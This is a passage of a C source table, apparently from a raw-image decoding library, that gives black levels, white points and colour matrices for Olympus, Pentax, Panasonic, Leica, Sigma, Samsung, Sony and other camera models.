{ 6588,-1305,-693,-3277,10987,2634,-355,2016,5106 } },
{ "Nikon 1 ", 0, 0, /* J1, J2, S1, V1 */
{ 8994,-2667,-865,-4594,12324,2552,-699,1786,6260 } },
{ "Olympus AIR-A01", 0, 0xfe1,
{ 8992,-3093,-639,-2563,10721,2122,-437,1270,5473 } },
{ "Olympus C5050", 0, 0,
{ 10508,-3124,-1273,-6079,14294,1901,-1653,2306,6237 } },
{ "Olympus C5060", 0, 0,
{ 10445,-3362,-1307,-7662,15690,2058,-1135,1176,7602 } },
{ "Olympus C7070", 0, 0,
{ 10252,-3531,-1095,-7114,14850,2436,-1451,1723,6365 } },
{ "Olympus C70", 0, 0,
{ 10793,-3791,-1146,-7498,15177,2488,-1390,1577,7321 } },
{ "Olympus C80", 0, 0,
{ 8606,-2509,-1014,-8238,15714,2703,-942,979,7760 } },
{ "Olympus E-10", 0, 0xffc,
{ 12745,-4500,-1416,-6062,14542,1580,-1934,2256,6603 } },
{ "Olympus E-1", 0, 0,
{ 11846,-4767,-945,-7027,15878,1089,-2699,4122,8311 } },
{ "Olympus E-20", 0, 0xffc,
{ 13173,-4732,-1499,-5807,14036,1895,-2045,2452,7142 } },
{ "Olympus E-300", 0, 0,
{ 7828,-1761,-348,-5788,14071,1830,-2853,4518,6557 } },
{ "Olympus E-330", 0, 0,
{ 8961,-2473,-1084,-7979,15990,2067,-2319,3035,8249 } },
{ "Olympus E-30", 0, 0xfbc,
{ 8144,-1861,-1111,-7763,15894,1929,-1865,2542,7607 } },
{ "Olympus E-3", 0, 0xf99,
{ 9487,-2875,-1115,-7533,15606,2010,-1618,2100,7389 } },
{ "Olympus E-400", 0, 0,
{ 6169,-1483,-21,-7107,14761,2536,-2904,3580,8568 } },
{ "Olympus E-410", 0, 0xf6a,
{ 8856,-2582,-1026,-7761,15766,2082,-2009,2575,7469 } },
{ "Olympus E-420", 0, 0xfd7,
{ 8746,-2425,-1095,-7594,15612,2073,-1780,2309,7416 } },
{ "Olympus E-450", 0, 0xfd2,
{ 8745,-2425,-1095,-7594,15613,2073,-1780,2309,7416 } },
{ "Olympus E-500", 0, 0,
{ 8136,-1968,-299,-5481,13742,1871,-2556,4205,6630 } },
{ "Olympus E-510", 0, 0xf6a,
{ 8785,-2529,-1033,-7639,15624,2112,-1783,2300,7817 } },
{ "Olympus E-520", 0, 0xfd2,
{ 8344,-2322,-1020,-7596,15635,2048,-1748,2269,7287 } },
{ "Olympus E-5", 0, 0xeec,
{ 11200,-3783,-1325,-4576,12593,2206,-695,1742,7504 } },
{ "Olympus E-600", 0, 0xfaf,
{ 8453,-2198,-1092,-7609,15681,2008,-1725,2337,7824 } },
{ "Olympus E-620", 0, 0xfaf,
{ 8453,-2198,-1092,-7609,15681,2008,-1725,2337,7824 } },
{ "Olympus E-P1", 0, 0xffd,
{ 8343,-2050,-1021,-7715,15705,2103,-1831,2380,8235 } },
{ "Olympus E-P2", 0, 0xffd,
{ 8343,-2050,-1021,-7715,15705,2103,-1831,2380,8235 } },
{ "Olympus E-P3", 0, 0,
{ 7575,-2159,-571,-3722,11341,2725,-1434,2819,6271 } },
{ "Olympus E-P5", 0, 0,
{ 8380,-2630,-639,-2887,10725,2496,-627,1427,5438 } },
{ "Olympus E-PL1s", 0, 0,
{ 11409,-3872,-1393,-4572,12757,2003,-709,1810,7415 } },
{ "Olympus E-PL1", 0, 0,
{ 11408,-4289,-1215,-4286,12385,2118,-387,1467,7787 } },
{ "Olympus E-PL2", 0, 0xcf3,
{ 15030,-5552,-1806,-3987,12387,1767,-592,1670,7023 } },
{ "Olympus E-PL3", 0, 0,
{ 7575,-2159,-571,-3722,11341,2725,-1434,2819,6271 } },
{ "Olympus E-PL5", 0, 0xfcb,
{ 8380,-2630,-639,-2887,10725,2496,-627,1427,5438 } },
{ "Olympus E-PL6", 0, 0,
{ 8380,-2630,-639,-2887,10725,2496,-627,1427,5438 } },
{ "Olympus E-PL7", 0, 0,
{ 9197,-3190,-659,-2606,10830,2039,-458,1250,5458 } },
{ "Olympus E-PL8", 0, 0,
{ 9197,-3190,-659,-2606,10830,2039,-458,1250,5458 } },
{ "Olympus E-PM1", 0, 0,
{ 7575,-2159,-571,-3722,11341,2725,-1434,2819,6271 } },
{ "Olympus E-PM2", 0, 0,
{ 8380,-2630,-639,-2887,10725,2496,-627,1427,5438 } },
{ "Olympus E-M10", 0, 0, /* Same for E-M10MarkII */
{ 8380,-2630,-639,-2887,10725,2496,-627,1427,5438 } },
{ "Olympus E-M1MarkII", 0, 0, /* Adobe */
{ 8380, -2630, -639, -2887, 10725, 2496, -627, 1427, 5438 }},
{ "Olympus E-M1", 0, 0,
{ 7687,-1984,-606,-4327,11928,2721,-1381,2339,6452 } },
{ "Olympus E-M5MarkII", 0, 0,
{ 9422,-3258,-711,-2655,10898,2015,-512,1354,5512 } },
{ "Olympus E-M5", 0, 0xfe1,
{ 8380,-2630,-639,-2887,10725,2496,-627,1427,5438 } },
{ "Olympus PEN-F",0, 0,
{ 9476,-3182,-765,-2613,10958,1893,-449,1315,5268 } },
{ "Olympus SP350", 0, 0,
{ 12078,-4836,-1069,-6671,14306,2578,-786,939,7418 } },
{ "Olympus SP3", 0, 0,
{ 11766,-4445,-1067,-6901,14421,2707,-1029,1217,7572 } },
{ "Olympus SP500UZ", 0, 0xfff,
{ 9493,-3415,-666,-5211,12334,3260,-1548,2262,6482 } },
{ "Olympus SP510UZ", 0, 0xffe,
{ 10593,-3607,-1010,-5881,13127,3084,-1200,1805,6721 } },
{ "Olympus SP550UZ", 0, 0xffe,
{ 11597,-4006,-1049,-5432,12799,2957,-1029,1750,6516 } },
{ "Olympus SP560UZ", 0, 0xff9,
{ 10915,-3677,-982,-5587,12986,2911,-1168,1968,6223 } },
{ "Olympus SP570UZ", 0, 0,
{ 11522,-4044,-1146,-4736,12172,2904,-988,1829,6039 } },
{ "Olympus SH-2", 0, 0,
{ 10156,-3425,-1077,-2611,11177,1624,-385,1592,5080 } },
{ "Olympus SH-3", 0, 0, /* Alias of SH-2 */
{ 10156,-3425,-1077,-2611,11177,1624,-385,1592,5080 } },
{ "Olympus STYLUS1",0, 0,
{ 11976,-5518,-545,-1419,10472,846,-475,1766,4524 } },
{ "Olympus TG-4", 0, 0,
{ 11426,-4159,-1126,-2066,10678,1593,-120,1327,4998 } },
{ "Olympus XZ-10", 0, 0,
{ 9777,-3483,-925,-2886,11297,1800,-602,1663,5134 } },
{ "Olympus XZ-1", 0, 0,
{ 10901,-4095,-1074,-1141,9208,2293,-62,1417,5158 } },
{ "Olympus XZ-2", 0, 0,
{ 9777,-3483,-925,-2886,11297,1800,-602,1663,5134 } },
{ "OmniVision", 16, 0x3ff,
{ 12782,-4059,-379,-478,9066,1413,1340,1513,5176 } }, /* DJC */
{ "Pentax *ist DL2", 0, 0,
{ 10504,-2438,-1189,-8603,16207,2531,-1022,863,12242 } },
{ "Pentax *ist DL", 0, 0,
{ 10829,-2838,-1115,-8339,15817,2696,-837,680,11939 } },
{ "Pentax *ist DS2", 0, 0,
{ 10504,-2438,-1189,-8603,16207,2531,-1022,863,12242 } },
{ "Pentax *ist DS", 0, 0,
{ 10371,-2333,-1206,-8688,16231,2602,-1230,1116,11282 } },
{ "Pentax *ist D", 0, 0,
{ 9651,-2059,-1189,-8881,16512,2487,-1460,1345,10687 } },
{ "Pentax K10D", 0, 0,
{ 9566,-2863,-803,-7170,15172,2112,-818,803,9705 } },
{ "Pentax K1", 0, 0,
{ 11095,-3157,-1324,-8377,15834,2720,-1108,947,11688 } },
{ "Pentax K20D", 0, 0,
{ 9427,-2714,-868,-7493,16092,1373,-2199,3264,7180 } },
{ "Pentax K200D", 0, 0,
{ 9186,-2678,-907,-8693,16517,2260,-1129,1094,8524 } },
{ "Pentax K2000", 0, 0,
{ 11057,-3604,-1155,-5152,13046,2329,-282,375,8104 } },
{ "Pentax K-m", 0, 0,
{ 11057,-3604,-1155,-5152,13046,2329,-282,375,8104 } },
{ "Pentax K-x", 0, 0,
{ 8843,-2837,-625,-5025,12644,2668,-411,1234,7410 } },
{ "Pentax K-r", 0, 0,
{ 9895,-3077,-850,-5304,13035,2521,-883,1768,6936 } },
{ "Pentax K-1", 0, 0,
{ 8566,-2746,-1201,-3612,12204,1550,-893,1680,6264 } },
{ "Pentax K-30", 0, 0,
{ 8710,-2632,-1167,-3995,12301,1881,-981,1719,6535 } },
{ "Pentax K-3 II", 0, 0,
{ 8626,-2607,-1155,-3995,12301,1881,-1039,1822,6925 } },
{ "Pentax K-3", 0, 0,
{ 7415,-2052,-721,-5186,12788,2682,-1446,2157,6773 } },
{ "Pentax K-5 II", 0, 0,
{ 8170,-2725,-639,-4440,12017,2744,-771,1465,6599 } },
{ "Pentax K-5", 0, 0,
{ 8713,-2833,-743,-4342,11900,2772,-722,1543,6247 } },
{ "Pentax K-70", 0, 0,
{8766, -3149, -747, -3976, 11943, 2292, -517, 1259, 5552 }},
{ "Pentax K-7", 0, 0,
{ 9142,-2947,-678,-8648,16967,1663,-2224,2898,8615 } },
{ "Pentax K-S1", 0, 0,
{ 8512,-3211,-787,-4167,11966,2487,-638,1288,6054 } },
{ "Pentax K-S2", 0, 0,
{ 8662,-3280,-798,-3928,11771,2444,-586,1232,6054 } },
{ "Pentax Q-S1", 0, 0,
{ 12995,-5593,-1107,-1879,10139,2027,-64,1233,4919 } },
{ "Pentax MX-1", 0, 0,
{ 8804,-2523,-1238,-2423,11627,860,-682,1774,4753 } },
{ "Pentax Q10", 0, 0,
{ 12995,-5593,-1107,-1879,10139,2027,-64,1233,4919 } },
{ "Pentax 645D", 0, 0x3e00,
{ 10646,-3593,-1158,-3329,11699,1831,-667,2874,6287 } },
{ "Pentax 645Z", 0, 0, /* Adobe */
{ 9702, -3060, -1254, -3685, 12133, 1721, -1086, 2010, 6971}},
{ "Panasonic DMC-CM10", -15, 0,
{ 8770, -3194,-820,-2871,11281,1803,-513,1552,4434 } },
{ "Panasonic DMC-CM1", -15, 0,
{ 8770, -3194,-820,-2871,11281,1803,-513,1552,4434 } },
{ "Panasonic DMC-FZ8", 0, 0xf7f,
{ 8986,-2755,-802,-6341,13575,3077,-1476,2144,6379 } },
{ "Panasonic DMC-FZ18", 0, 0,
{ 9932,-3060,-935,-5809,13331,2753,-1267,2155,5575 } },
{ "Panasonic DMC-FZ28", -15, 0xf96,
{ 10109,-3488,-993,-5412,12812,2916,-1305,2140,5543 } },
{ "Panasonic DMC-FZ300", -15, 0xfff,
{ 8378,-2798,-769,-3068,11410,1877,-538,1792,4623 } },
{ "Panasonic DMC-FZ330", -15, 0xfff, // same as FZ300
{ 8378,-2798,-769,-3068,11410,1877,-538,1792,4623 } },
{ "Panasonic DMC-FZ30", 0, 0xf94,
{ 10976,-4029,-1141,-7918,15491,2600,-1670,2071,8246 } },
{ "Panasonic DMC-FZ3", -15, 0,
{ 9938,-2780,-890,-4604,12393,2480,-1117,2304,4620 } },
{ "Panasonic DMC-FZ4", -15, 0,
{ 13639,-5535,-1371,-1698,9633,2430,316,1152,4108 } },
{ "Panasonic DMC-FZ50", 0, 0,
{ 7906,-2709,-594,-6231,13351,3220,-1922,2631,6537 } },
{ "Panasonic DMC-FZ7", -15, 0,
{ 11532,-4324,-1066,-2375,10847,1749,-564,1699,4351 } },
{ "Leica V-LUX1", 0, 0,
{ 7906,-2709,-594,-6231,13351,3220,-1922,2631,6537 } },
{ "Panasonic DMC-L10", -15, 0xf96,
{ 8025,-1942,-1050,-7920,15904,2100,-2456,3005,7039 } },
{ "Panasonic DMC-L1", 0, 0xf7f,
{ 8054,-1885,-1025,-8349,16367,2040,-2805,3542,7629 } },
{ "Leica DIGILUX 3", 0, 0xf7f,
{ 8054,-1885,-1025,-8349,16367,2040,-2805,3542,7629 } },
{ "Panasonic DMC-LC1", 0, 0,
{ 11340,-4069,-1275,-7555,15266,2448,-2960,3426,7685 } },
{ "Leica DIGILUX 2", 0, 0,
{ 11340,-4069,-1275,-7555,15266,2448,-2960,3426,7685 } },
{ "Panasonic DMC-LX100", -15, 0,
{ 8844,-3538,-768,-3709,11762,2200,-698,1792,5220 } },
{ "Leica D-LUX (Typ 109)", -15, 0,
{ 8844,-3538,-768,-3709,11762,2200,-698,1792,5220 } },
{ "Panasonic DMC-LF1", -15, 0,
{ 9379,-3267,-816,-3227,11560,1881,-926,1928,5340 } },
{ "Leica C (Typ 112)", -15, 0,
{ 9379,-3267,-816,-3227,11560,1881,-926,1928,5340 } },
{ "Panasonic DMC-LX9", -15, 0, /* markets: LX9 LX10 LX15 */
{ 7790, -2736, -755, -3452, 11870, 1769, -628, 1647, 4898 }}, /* Adobe*/
{ "Panasonic DMC-LX10", -15, 0, /* markets: LX9 LX10 LX15 */
{ 7790, -2736, -755, -3452, 11870, 1769, -628, 1647, 4898 }}, /* Adobe*/
{ "Panasonic DMC-LX15", -15, 0, /* markets: LX9 LX10 LX15 */
{ 7790, -2736, -755, -3452, 11870, 1769, -628, 1647, 4898 }}, /* Adobe*/
{ "Panasonic DMC-LX1", 0, 0xf7f,
{ 10704,-4187,-1230,-8314,15952,2501,-920,945,8927 } },
{ "Leica D-Lux (Typ 109)", 0, 0xf7f,
{ 8844,-3538,-768,-3709,11762,2200,-698,1792,5220 } },
{ "Leica D-LUX2", 0, 0xf7f,
{ 10704,-4187,-1230,-8314,15952,2501,-920,945,8927 } },
{ "Panasonic DMC-LX2", 0, 0,
{ 8048,-2810,-623,-6450,13519,3272,-1700,2146,7049 } },
{ "Leica D-LUX3", 0, 0,
{ 8048,-2810,-623,-6450,13519,3272,-1700,2146,7049 } },
{ "Panasonic DMC-LX3", -15, 0,
{ 8128,-2668,-655,-6134,13307,3161,-1782,2568,6083 } },
{ "Leica D-LUX 4", -15, 0,
{ 8128,-2668,-655,-6134,13307,3161,-1782,2568,6083 } },
{ "Panasonic DMC-LX5", -15, 0,
{ 10909,-4295,-948,-1333,9306,2399,22,1738,4582 } },
{ "Leica D-LUX 5", -15, 0,
{ 10909,-4295,-948,-1333,9306,2399,22,1738,4582 } },
{ "Panasonic DMC-LX7", -15, 0,
{ 10148,-3743,-991,-2837,11366,1659,-701,1893,4899 } },
{ "Leica D-LUX 6", -15, 0,
{ 10148,-3743,-991,-2837,11366,1659,-701,1893,4899 } },
{ "Panasonic DMC-FZ1000", -15, 0,
{ 7830,-2696,-763,-3325,11667,1866,-641,1712,4824 } },
{ "Leica V-LUX (Typ 114)", 15, 0,
{ 7830,-2696,-763,-3325,11667,1866,-641,1712,4824 } },
{ "Panasonic DMC-FZ100", -15, 0xfff,
{ 16197,-6146,-1761,-2393,10765,1869,366,2238,5248 } },
{ "Leica V-LUX 2", -15, 0xfff,
{ 16197,-6146,-1761,-2393,10765,1869,366,2238,5248 } },
{ "Panasonic DMC-FZ150", -15, 0xfff,
{ 11904,-4541,-1189,-2355,10899,1662,-296,1586,4289 } },
{ "Leica V-LUX 3", -15, 0xfff,
{ 11904,-4541,-1189,-2355,10899,1662,-296,1586,4289 } },
{ "Panasonic DMC-FZ2000", -15, 0, /* markets: DMC-FZ2000,DMC-FZ2500,FZH1 */
{ 7386, -2443, -743, -3437, 11864, 1757, -608, 1660, 4766 }},
{ "Panasonic DMC-FZ2500", -15, 0,
{ 7386, -2443, -743, -3437, 11864, 1757, -608, 1660, 4766 }},
{ "Panasonic DMC-FZH1", -15, 0,
{ 7386, -2443, -743, -3437, 11864, 1757, -608, 1660, 4766 }},
{ "Panasonic DMC-FZ200", -15, 0xfff,
{ 8112,-2563,-740,-3730,11784,2197,-941,2075,4933 } },
{ "Leica V-LUX 4", -15, 0xfff,
{ 8112,-2563,-740,-3730,11784,2197,-941,2075,4933 } },
{ "Panasonic DMC-FX150", -15, 0xfff,
{ 9082,-2907,-925,-6119,13377,3058,-1797,2641,5609 } },
{ "Panasonic DMC-G10", 0, 0,
{ 10113,-3400,-1114,-4765,12683,2317,-377,1437,6710 } },
{ "Panasonic DMC-G1", -15, 0xf94,
{ 8199,-2065,-1056,-8124,16156,2033,-2458,3022,7220 } },
{ "Panasonic DMC-G2", -15, 0xf3c,
{ 10113,-3400,-1114,-4765,12683,2317,-377,1437,6710 } },
{ "Panasonic DMC-G3", -15, 0xfff,
{ 6763,-1919,-863,-3868,11515,2684,-1216,2387,5879 } },
{ "Panasonic DMC-G5", -15, 0xfff,
{ 7798,-2562,-740,-3879,11584,2613,-1055,2248,5434 } },
{ "Panasonic DMC-G6", -15, 0xfff,
{ 8294,-2891,-651,-3869,11590,2595,-1183,2267,5352 } },
{ "Panasonic DMC-G7", -15, 0xfff,
{ 7610,-2780,-576,-4614,12195,2733,-1375,2393,6490 } },
{ "Panasonic DMC-G8", -15, 0xfff, /* markets: DMC-G8, DMC-G80, DMC-G81, DMC-G85 */
{ 7610,-2780,-576,-4614,12195,2733,-1375,2393,6490 } },
{ "Panasonic DMC-GF1", -15, 0xf92,
{ 7888,-1902,-1011,-8106,16085,2099,-2353,2866,7330 } },
{ "Panasonic DMC-GF2", -15, 0xfff,
{ 7888,-1902,-1011,-8106,16085,2099,-2353,2866,7330 } },
{ "Panasonic DMC-GF3", -15, 0xfff,
{ 9051,-2468,-1204,-5212,13276,2121,-1197,2510,6890 } },
{ "Panasonic DMC-GF5", -15, 0xfff,
{ 8228,-2945,-660,-3938,11792,2430,-1094,2278,5793 } },
{ "Panasonic DMC-GF6", -15, 0,
{ 8130,-2801,-946,-3520,11289,2552,-1314,2511,5791 } },
{ "Panasonic DMC-GF7", -15, 0,
{ 7610,-2780,-576,-4614,12195,2733,-1375,2393,6490 } },
{ "Panasonic DMC-GF8", -15, 0,
{ 7610,-2780,-576,-4614,12195,2733,-1375,2393,6490 } },
{ "Panasonic DMC-GH1", -15, 0xf92,
{ 6299,-1466,-532,-6535,13852,2969,-2331,3112,5984 } },
{ "Panasonic DMC-GH2", -15, 0xf95,
{ 7780,-2410,-806,-3913,11724,2484,-1018,2390,5298 } },
{ "Panasonic DMC-GH3", -15, 0,
{ 6559,-1752,-491,-3672,11407,2586,-962,1875,5130 } },
{ "Panasonic DMC-GH4", -15, 0,
{ 7122,-2108,-512,-3155,11201,2231,-541,1423,5045 } },
{ "Yuneec CGO4", -15, 0,
{ 7122,-2108,-512,-3155,11201,2231,-541,1423,5045 } },
{ "Panasonic DMC-GM1", -15, 0,
{ 6770,-1895,-744,-5232,13145,2303,-1664,2691,5703 } },
{ "Panasonic DMC-GM5", -15, 0,
{ 8238,-3244,-679,-3921,11814,2384,-836,2022,5852 } },
{ "Panasonic DMC-GX1", -15, 0,
{ 6763,-1919,-863,-3868,11515,2684,-1216,2387,5879 } },
{ "Panasonic DMC-GX85", -15, 0, /* markets: GX85 GX80 GX7MK2 */
{ 7771,-3020,-629,4029,11950,2345,-821,1977,6119 } },
{ "Panasonic DMC-GX80", -15, 0, /* markets: GX85 GX80 GX7MK2 */
{ 7771,-3020,-629,4029,11950,2345,-821,1977,6119 } },
{ "Panasonic DMC-GX7MK2", -15, 0, /* markets: GX85 GX80 GX7MK2 */
{ 7771,-3020,-629,4029,11950,2345,-821,1977,6119 } },
{ "Panasonic DMC-GX7", -15,0,
{ 7610,-2780,-576,-4614,12195,2733,-1375,2393,6490 } },
{ "Panasonic DMC-GX8", -15,0,
{ 7564,-2263,-606,-3148,11239,2177,-540,1435,4853 } },
{ "Panasonic DMC-TZ6", -15, 0, /* markets: ZS40 TZ60 TZ61 */
{ 8607,-2822,-808,-3755,11930,2049,-820,2060,5224 } },
{ "Panasonic DMC-TZ8", -15, 0, /* markets: ZS60 TZ80 TZ81 TZ85 */
{ 8550,-2908,-842,-3195,11529,1881,-338,1603,4631 } },
{ "Panasonic DMC-ZS4", -15, 0, /* markets: ZS40 TZ60 TZ61 */
{ 8607,-2822,-808,-3755,11930,2049,-820,2060,5224 } },
{ "Panasonic DMC-TZ7", -15, 0, /* markets: ZS50 TZ70 TZ71 */
{ 8802,-3135,-789,-3151,11468,1904,-550,1745,4810 } },
{ "Panasonic DMC-ZS5", -15, 0, /* markets: ZS50 TZ70 TZ71 */
{ 8802,-3135,-789,-3151,11468,1904,-550,1745,4810 } },
{ "Panasonic DMC-ZS6", -15, 0, /* markets: ZS60 TZ80 TZ81 TZ85 */
{ 8550,-2908,-842,-3195,11529,1881,-338,1603,4631 } },
{ "Panasonic DMC-ZS100", -15, 0, /* markets: ZS100 ZS110 TZ100 TZ101 TZ110 TX1 */
{ 7790,-2736,-755,-3452,11870,1769,-628,1647,4898 } },
{ "Panasonic DMC-ZS110", -15, 0, /* markets: ZS100 ZS110 TZ100 TZ101 TZ110 TX1 */
{ 7790,-2736,-755,-3452,11870,1769,-628,1647,4898 } },
{ "Panasonic DMC-TZ100", -15, 0, /* markets: ZS100 ZS110 TZ100 TZ101 TZ110 TX1 */
{ 7790,-2736,-755,-3452,11870,1769,-628,1647,4898 } },
{ "Panasonic DMC-TZ101", -15, 0, /* markets: ZS100 ZS110 TZ100 TZ101 TZ110 TX1 */
{ 7790,-2736,-755,-3452,11870,1769,-628,1647,4898 } },
{ "Panasonic DMC-TZ110", -15, 0, /* markets: ZS100 ZS110 TZ100 TZ101 TZ110 TX1 */
{ 7790,-2736,-755,-3452,11870,1769,-628,1647,4898 } },
{ "Panasonic DMC-TX1", -15, 0, /* markets: ZS100 ZS110 TZ100 TZ101 TZ110 TX1 */
{ 7790,-2736,-755,-3452,11870,1769,-628,1647,4898 } },
{ "Leica S (Typ 007)", 0, 0,
{ 6063,-2234,-231,-5210,13787,1500,-1043,2866,6997 } },
{ "Leica X", 0, 0, /* X and X-U, both (Typ 113) */
{ 7712,-2059,-653,-3882,11494,2726,-710,1332,5958 } },
{ "Leica Q (Typ 116)", 0, 0,
{ 11865,-4523,-1441,-5423,14458,935,-1587,2687,4830 } },
{ "Leica M (Typ 262)", 0, 0,
{ 6653,-1486,-611,-4221,13303,929,-881,2416,7226 } },
{ "Leica SL (Typ 601)", 0, 0,
{ 11865,-4523,-1441,-5423,14458,935,-1587,2687,4830} },
{ "Phase One H 20", 0, 0, /* DJC */
{ 1313,1855,-109,-6715,15908,808,-327,1840,6020 } },
{ "Phase One H 25", 0, 0,
{ 2905,732,-237,-8134,16626,1476,-3038,4253,7517 } },
{ "Phase One IQ250",0, 0,
{ 4396,-153,-249,-5267,12249,2657,-1397,2323,6014 } },
{ "Phase One P 2", 0, 0,
{ 2905,732,-237,-8134,16626,1476,-3038,4253,7517 } },
{ "Phase One P 30", 0, 0,
{ 4516,-245,-37,-7020,14976,2173,-3206,4671,7087 } },
{ "Phase One P 45", 0, 0,
{ 5053,-24,-117,-5684,14076,1702,-2619,4492,5849 } },
{ "Phase One P40", 0, 0,
{ 8035,435,-962,-6001,13872,2320,-1159,3065,5434 } },
{ "Phase One P65", 0, 0,
{ 8035,435,-962,-6001,13872,2320,-1159,3065,5434 } },
{ "Photron BC2-HD", 0, 0, /* DJC */
{ 14603,-4122,-528,-1810,9794,2017,-297,2763,5936 } },
{ "Red One", 704, 0xffff, /* DJC */
{ 21014,-7891,-2613,-3056,12201,856,-2203,5125,8042 } },
{ "Ricoh GR II", 0, 0,
{ 4630,-834,-423,-4977,12805,2417,-638,1467,6115 } },
{ "Ricoh GR", 0, 0,
{ 3708,-543,-160,-5381,12254,3556,-1471,1929,8234 } },
{ "Samsung EK-GN120", 0, 0, /* Adobe; Galaxy NX */
{ 7557,-2522,-739,-4679,12949,1894,-840,1777,5311 } },
{ "Samsung EX1", 0, 0x3e00,
{ 8898,-2498,-994,-3144,11328,2066,-760,1381,4576 } },
{ "Samsung EX2F", 0, 0x7ff,
{ 10648,-3897,-1055,-2022,10573,1668,-492,1611,4742 } },
{ "Samsung NX mini", 0, 0,
{ 5222,-1196,-550,-6540,14649,2009,-1666,2819,5657 } },
{ "Samsung NX3300", 0, 0, /* same as NX3000 */
{ 8060,-2933,-761,-4504,12890,1762,-630,1489,5227 } },
{ "Samsung NX3000", 0, 0,
{ 8060,-2933,-761,-4504,12890,1762,-630,1489,5227 } },
{ "Samsung NX30", 0, 0, /* NX30, NX300, NX300M */
{ 7557,-2522,-739,-4679,12949,1894,-840,1777,5311 } },
{ "Samsung NX2000", 0, 0,
{ 7557,-2522,-739,-4679,12949,1894,-840,1777,5311 } },
{ "Samsung NX2", 0, 0xfff, /* NX20, NX200, NX210 */
{ 6933,-2268,-753,-4921,13387,1647,-803,1641,6096 } },
{ "Samsung NX1000", 0, 0,
{ 6933,-2268,-753,-4921,13387,1647,-803,1641,6096 } },
{ "Samsung NX1100", 0, 0,
{ 6933,-2268,-753,-4921,13387,1647,-803,1641,6096 } },
{ "Samsung NX11", 0, 0,
{ 10332,-3234,-1168,-6111,14639,1520,-1352,2647,8331 } },
{ "Samsung NX10", 0, 0, /* also NX100 */
{ 10332,-3234,-1168,-6111,14639,1520,-1352,2647,8331 } },
{ "Samsung NX500", 0, 0,
{ 10686,-4042,-1052,-3595,13238,276,-464,1259,5931 } },
{ "Samsung NX5", 0, 0,
{ 10332,-3234,-1168,-6111,14639,1520,-1352,2647,8331 } },
{ "Samsung NX1", 0, 0,
{ 10686,-4042,-1052,-3595,13238,276,-464,1259,5931 } },
{ "Samsung WB2000", 0, 0xfff,
{ 12093,-3557,-1155,-1000,9534,1733,-22,1787,4576 } },
{ "Samsung GX-1", 0, 0,
{ 10504,-2438,-1189,-8603,16207,2531,-1022,863,12242 } },
{ "Samsung GX20", 0, 0, /* copied from Pentax K20D */
{ 9427,-2714,-868,-7493,16092,1373,-2199,3264,7180 } },
{ "Samsung S85", 0, 0, /* DJC */
{ 11885,-3968,-1473,-4214,12299,1916,-835,1655,5549 } },
// Foveon: LibRaw color data
{ "Sigma dp0 Quattro", 2047, 0,
{ 13801,-3390,-1016,5535,3802,877,1848,4245,3730 } },
{ "Sigma dp1 Quattro", 2047, 0,
{ 13801,-3390,-1016,5535,3802,877,1848,4245,3730 } },
{ "Sigma dp2 Quattro", 2047, 0,
{ 13801,-3390,-1016,5535,3802,877,1848,4245,3730 } },
{ "Sigma dp3 Quattro", 2047, 0,
{ 13801,-3390,-1016,5535,3802,877,1848,4245,3730 } },
{ "Sigma sd Quattro H", 256, 0,
{1295,108,-311, 256,828,-65,-28,750,254}}, /* temp, same as sd Quattro */
{ "Sigma sd Quattro", 2047, 0,
{1295,108,-311, 256,828,-65,-28,750,254}}, /* temp */
{ "Sigma SD9", 15, 4095, /* LibRaw */
{ 14082,-2201,-1056,-5243,14788,167,-121,196,8881 } },
{ "Sigma SD10", 15, 16383, /* LibRaw */
{ 14082,-2201,-1056,-5243,14788,167,-121,196,8881 } },
{ "Sigma SD14", 15, 16383, /* LibRaw */
{ 14082,-2201,-1056,-5243,14788,167,-121,196,8881 } },
{ "Sigma SD15", 15, 4095, /* LibRaw */
{ 14082,-2201,-1056,-5243,14788,167,-121,196,8881 } },
// Merrills + SD1
{ "Sigma SD1", 31, 4095, /* LibRaw */
{ 5133,-1895,-353,4978,744,144,3837,3069,2777 } },
{ "Sigma DP1 Merrill", 31, 4095, /* LibRaw */
{ 5133,-1895,-353,4978,744,144,3837,3069,2777 } },
{ "Sigma DP2 Merrill", 31, 4095, /* LibRaw */
{ 5133,-1895,-353,4978,744,144,3837,3069,2777 } },
{ "Sigma DP3 Merrill", 31, 4095, /* LibRaw */
{ 5133,-1895,-353,4978,744,144,3837,3069,2777 } },
// Sigma DP (non-Merrill versions)
{ "Sigma DP", 0, 4095, /* LibRaw */
// { 7401,-1169,-567,2059,3769,1510,664,3367,5328 } },
{ 13100,-3638,-847,6855,2369,580,2723,3218,3251 } },
{ "Sinar", 0, 0, /* DJC */
{ 16442,-2956,-2422,-2877,12128,750,-1136,6066,4559 } },
{ "Sony DSC-F828", 0, 0,
{ 7924,-1910,-777,-8226,15459,2998,-1517,2199,6818,-7242,11401,3481 } },
{ "Sony DSC-R1", 0, 0,
{ 8512,-2641,-694,-8042,15670,2526,-1821,2117,7414 } },
{ "Sony DSC-V3", 0, 0,
{ 7511,-2571,-692,-7894,15088,3060,-948,1111,8128 } },
{"Sony DSC-RX100M5", -800, 0, /* Adobe */
{6596, -2079, -562, -4782, 13016, 1933, -970, 1581, 5181 }},
{ "Sony DSC-RX100M", -800, 0, /* M2 and M3 and M4 */
{ 6596,-2079,-562,-4782,13016,1933,-970,1581,5181 } },
{ "Sony DSC-RX100", 0, 0,
{ 8651,-2754,-1057,-3464,12207,1373,-568,1398,4434 } },
{ "Sony DSC-RX10",0, 0, /* And M2/M3 too */
{ 6679,-1825,-745,-5047,13256,1953,-1580,2422,5183 } },
{ "Sony DSC-RX1RM2", 0, 0,
{ 6629,-1900,-483,-4618,12349,2550,-622,1381,6514 } },
{ "Sony DSC-RX1R", 0, 0,
{ 8195,-2800,-422,-4261,12273,1709,-1505,2400,5624 } },
{ "Sony DSC-RX1", 0, 0,
{ 6344,-1612,-462,-4863,12477,2681,-865,1786,6899 } },
{ "Sony DSLR-A100", 0, 0xfeb,
{ 9437,-2811,-774,-8405,16215,2290,-710,596,7181 } },
{ "Sony DSLR-A290", 0, 0,
{ 6038,-1484,-579,-9145,16746,2512,-875,746,7218 } },
{ "Sony DSLR-A2", 0, 0,
{ 9847,-3091,-928,-8485,16345,2225,-715,595,7103 } },
{ "Sony DSLR-A300", 0, 0,
{ 9847,-3091,-928,-8485,16345,2225,-715,595,7103 } },
{ "Sony DSLR-A330", 0, 0,
{ 9847,-3091,-929,-8485,16346,2225,-714,595,7103 } },
{ "Sony DSLR-A350", 0, 0xffc,
{ 6038,-1484,-578,-9146,16746,2513,-875,746,7217 } },
{ "Sony DSLR-A380", 0, 0,
{ 6038,-1484,-579,-9145,16746,2512,-875,746,7218 } },
{ "Sony DSLR-A390", 0, 0,
